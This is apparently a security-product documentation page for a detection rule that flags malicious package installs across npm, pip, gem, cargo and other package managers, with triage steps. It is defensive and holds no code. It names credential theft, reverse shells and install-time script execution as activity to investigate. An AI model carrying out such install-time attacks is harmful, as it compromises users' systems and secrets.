Malicious package installation

Classification:

attack

Tactic:

TA0001-initial-access

Technique:

T1195-supply-chain-compromise

이 페이지는 아직 한국어로 제공되지 않습니다. 번역 작업 중입니다.
현재 번역 프로젝트에 대한 질문이나 피드백이 있으신 경우 언제든지 연락주시기 바랍니다.

What happened

A malicious package was installed during a package manager installation process.

Goal

Detect the installation of packages with multiple attack tactics during package installation across npm, pip, gem, composer, cargo, and other package managers.

Strategy

This rule monitors package installations across multiple package managers (npm, yarn, pnpm, bun, pip, uv, pipx, poetry, conda, gem, bundler, composer, cargo) and alerts when multiple attack tactics are observed during the installation process, indicating potential supply chain attacks or malware being executed through post-install scripts, setup.py execution, native extension compilation, or similar install-time code execution mechanisms.

Triage and response

  1. Review the package installation details and identify which package and package manager triggered the alert.
  2. Investigate the tactics observed during installation to understand the nature of the malicious activity (e.g., credential theft, reverse shell, crypto mining).
  3. Check if the package version has been flagged on security advisories (npm advisories, PyPI, RubyGems, etc.).
  4. Remove the malicious package and any artifacts it may have created (e.g., .pth files for pip, compiled extensions for gem).
  5. Follow your organization’s internal processes for investigating and remediating compromised systems.